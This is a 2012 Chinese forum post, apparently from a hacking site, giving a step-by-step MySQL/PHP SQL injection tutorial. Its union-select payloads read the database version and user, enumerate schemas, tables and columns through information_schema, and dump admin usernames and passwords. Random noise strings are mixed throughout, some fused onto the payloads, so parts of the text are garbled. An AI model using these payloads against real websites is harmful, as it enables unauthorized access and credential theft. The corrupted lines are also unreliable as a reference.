5 u3 i% K4 q: [" Y4 p
教程内容:Mysql 5+php 注入
! M, _0 b& T" G6 c; {7 m4 D M. Y1 x1 S |7 G! j4 e
# B- @7 r5 N( g5 j- f/ N( M! [4 A/ \4 x9 t7 M- R7 j3 x
一.查看MYSQL基本信息(库名,版本,用户)
* o6 D; C0 E5 ^. t; ?
: m7 o1 x+ R& n" B1 G- e q6 M; h3 rand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*/ X6 `/ L. ~& S( j& r+ c. }
% s" ^/ y" ~- K* d$ Z0 v& c
二.查数据库
+ z2 i* N2 U M# N. V* L* C; ^9 q0 ^' N3 w4 o! j5 Q2 H ]3 q
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
# X. d0 u9 ]; n" `" J- ^! G$ {limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
& F% J0 r3 f% c) l7 g
) }) x4 b3 z8 g S三.暴表7 P$ b% o" S* m; z4 H' R% A
* t6 D6 h l$ I6 y6 c
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*+ v9 O+ k2 R) H; D+ J
- r4 N: ^" I* ?& c0 N8 f0 e/ _+ q: blimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
4 ?. o9 n( D# ?3 D6 B
: \( z: J3 p9 `8 b1 Q四.暴字段! S. Z- } ?. q5 z6 M4 m5 `
" s' B- G) }' `4 ~and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
, S4 s- Z [# ^4 t+ p a% @" m
+ G R) C5 I9 e$ |2 Jlimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。& k/ U6 V, \1 h
" t+ R; {9 u! `五.暴数据
( f+ g' L) r: r! T- |
5 V3 j8 U0 Q/ i4 J. e6 j+ oand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*, Q1 Q- ?8 e/ {5 e) S
' w" s8 Y! \7 ^4 d5 g6 m
4 r- S, g8 A+ X$ t8 d
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。6 h, G) B" ?3 P
|
发表于 2012-9-13 16:27:53
收藏
支持
反对